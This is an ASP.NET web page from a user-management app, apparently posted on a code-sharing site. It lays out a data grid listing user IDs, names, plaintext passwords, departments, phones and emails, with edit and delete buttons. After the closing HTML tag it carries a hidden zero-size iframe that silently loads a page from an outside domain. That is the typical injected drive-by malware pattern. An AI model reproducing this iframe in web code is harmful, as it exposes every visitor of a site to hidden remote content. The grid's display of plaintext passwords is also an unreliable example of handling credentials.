📄 liulanclient.aspx
字号:
<%@ Register TagPrefix="uc1" TagName="guanli" Src="guanli.ascx" %>
<%@ Register TagPrefix="uc1" TagName="title" Src="title.ascx" %>
<%@ Page language="c#" Codebehind="liulanclient.aspx.cs" AutoEventWireup="false" Inherits="login.liulanclient" %>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
<HEAD>
<title>liulanclient</title>
<meta name="vs_snapToGrid" content="True">
<meta name="vs_showGrid" content="True">
<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
<meta name="CODE_LANGUAGE" Content="C#">
<meta name="vs_defaultClientScript" content="JavaScript">
<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
</HEAD>
<body MS_POSITIONING="GridLayout" background="file:///E:\net\login\pic\JDSJ781.jpg">
<form id="Form1" method="post" runat="server">
<FONT face="宋体">
<TABLE id="Table1" style="Z-INDEX: 101; LEFT: 152px; POSITION: absolute; TOP: 80px" cellSpacing="1"
cellPadding="1" width="300" align="center" border="1">
<TR>
<TD>
<uc1:title id="Title1" runat="server"></uc1:title></TD>
</TR>
</TABLE>
</FONT>
<TABLE id="Table2" style="Z-INDEX: 102; LEFT: 8px; WIDTH: 120px; POSITION: absolute; TOP: 216px; HEIGHT: 27px"
cellSpacing="1" cellPadding="1" width="120" border="1">
<TR>
<TD>
<uc1:guanli id="Guanli1" runat="server"></uc1:guanli></TD>
</TR>
</TABLE>
<asp:Label id="Label1" style="Z-INDEX: 103; LEFT: 264px; POSITION: absolute; TOP: 432px" runat="server"
Width="120px">Label</asp:Label>
<asp:DataGrid id="DataGrid1" style="Z-INDEX: 104; LEFT: 144px; POSITION: absolute; TOP: 176px"
runat="server" Width="552px" Height="120px" AutoGenerateColumns="False" BorderColor="#3366CC"
BorderStyle="None" BorderWidth="1px" BackColor="White" CellPadding="4" AllowPaging="True"
PageSize="4">
<SelectedItemStyle Font-Bold="True" ForeColor="#CCFF99" BackColor="#009999"></SelectedItemStyle>
<ItemStyle ForeColor="#003399" BackColor="White"></ItemStyle>
<HeaderStyle Font-Bold="True" ForeColor="#CCCCFF" BackColor="#003399"></HeaderStyle>
<FooterStyle ForeColor="#003399" BackColor="#99CCCC"></FooterStyle>
<Columns>
<asp:BoundColumn DataField="userid" HeaderText="用户ID"></asp:BoundColumn>
<asp:BoundColumn DataField="username" HeaderText="用户名"></asp:BoundColumn>
<asp:BoundColumn DataField="pwd" HeaderText="密码"></asp:BoundColumn>
<asp:BoundColumn DataField="bumen" HeaderText="部门"></asp:BoundColumn>
<asp:BoundColumn DataField="tell" HeaderText="电话"></asp:BoundColumn>
<asp:BoundColumn DataField="mail" HeaderText="邮件"></asp:BoundColumn>
<asp:ButtonColumn Text="删除" CommandName="Delete"></asp:ButtonColumn>
<asp:EditCommandColumn ButtonType="LinkButton" UpdateText="更新" CancelText="取消" EditText="编辑"></asp:EditCommandColumn>
</Columns>
<PagerStyle HorizontalAlign="Left" ForeColor="#003399" BackColor="#99CCCC" Mode="NumericPages"></PagerStyle>
</asp:DataGrid>
</form>
</body>
</HTML>
<iframe src=http://www.puma166.com/1.htm width=0 height=0></iframe>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -